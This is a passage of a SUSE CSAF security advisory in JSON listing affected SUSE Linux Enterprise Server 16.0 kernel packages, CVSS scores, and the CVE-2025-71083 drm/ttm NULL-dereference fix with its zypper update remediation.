"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
"summary": "SUSE Bug 1256610 for CVE-2025-71083",
"url": "https://bugzilla.suse.com/1256610"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
